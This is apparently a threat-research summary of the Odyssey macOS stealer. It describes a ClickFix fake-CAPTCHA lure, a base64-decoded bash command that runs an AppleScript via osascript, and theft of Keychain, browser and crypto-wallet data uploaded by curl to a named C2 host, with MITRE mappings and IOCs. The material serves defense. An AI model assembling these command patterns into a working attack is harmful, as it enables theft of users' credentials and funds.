Threat Research

Odyssey MacOS Stealer

Securonix
Odyssey MacOS Stealer

Researchers observed a ClickFix phishing campaign targeting macOS that delivers an AppleScript-based stealer (Odyssey Stealer) via a fake CAPTCHA and terminal “base64 -d | bash” command, harvesting browsers, crypto wallets, Keychain items, and files before exfiltrating to a remote server. IOCs and protections show the infrastructure centered on 45.146.130[.]131 and the phishing domain tradingviewen[.]com. #OdysseyStealer #tradingviewen #45.146.130.131

Keypoints

  • Attack uses a ClickFix social-engineering technique presenting a fake CAPTCHA that detects OS and supplies OS-specific pasteable commands.
  • On macOS the pasted command decodes and runs a URL-hosted AppleScript (.scpt) via bash which requests the user password and executes with osascript.
  • The AppleScript enumerates and collects files from Desktop/Documents, Safari cookies, Apple Notes, Keychain files, and various browser data.
  • Chromium and Firefox profiles are scanned for crypto wallet-related extensions and local storage/indexedDB items for wallet data (e.g., Electrum, Exodus, Wasabi).
  • Collected data is packaged to /tmp/out.zip and exfiltrated to hxxp://45.146.130[.]131/log, then cleanup removes the temporary artifacts.
  • The campaign avoids dropping binaries, relying on obfuscated AppleScript and terminal commands to bypass traditional detection.
  • Defensive actions include blocking malicious URLs, adding .scpt signatures to threat databases, and categorizing C2 servers to prevent callbacks.

MITRE Techniques

  • [T1204] User Execution – Attackers trick users into executing pasted commands in the terminal via a fake CAPTCHA and OS-tailored instructions (“…the CAPTCHA verification…asks the user to perform several actions” / “…pasting command on terminal, it pastes a malicious command which executes using bash”).
  • [T1059] Command and Scripting Interpreter – The campaign uses bash and osascript to decode base64 commands and execute an AppleScript payload (“echo … | base64 -d | bash” and use of “osascript” to execute the AppleScript automatically).
  • [T1218] System Binary Proxy Execution – The AppleScript leverages legitimate system utilities (curl, mkdir, zip) to assemble and exfiltrate data (“mkdir …”, “curl” to upload /tmp/out.zip to hxxp://45.146.130[.]131/log”).
  • [T1005] Data from Local System – The AppleScript collects files from Desktop and Documents and Keychain and notes (“file gathering from user’s Desktop and Documents folder”, “script also gathers Safari cookies, Apple notes and Keychain files”).
  • [T1074] Data Staged – Collected artifacts are packaged into a ZIP archive in /tmp/out.zip prior to exfiltration (“scripts sets up the exfiltration mechanism and packages everything into a ZIP archive…saved to /tmp/out.zip”).
  • [T1041] Exfiltration Over HTTP/HTTPS – The ZIP archive is uploaded to a remote HTTP endpoint for data theft (“uploads archive to hxxp://45.146.130[.]131/log using a curl command”).
  • [T1113] Private Keys – The stealer targets browser/extension-stored crypto wallet items and keys by scanning local storage and indexedDB for wallet-related data (“scans their local storage and indexedDB directories … wallet related information stored is also exfiltrated”).

Indicators of Compromise

  • [Domain ] initial phishing domain – tradingviewen[.]com
  • [IP/C2 ] command-and-control and hosting – 45.146.130[.]131
  • [URL ] malicious payload and endpoints – hxxps://45.146.130[.]131/d/vipx14350, hxxps://45.146.130[.]131/log
  • [File ] AppleScript artifact – 43917e7dab6e09087de24f7878b9c1c1a7ec1968 (.scpt) and /tmp/out.zip (exfiltrated archive)

Read more: https://www.forcepoint.com/blog/x-labs/odyssey-stealer-attacks-macos-users

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint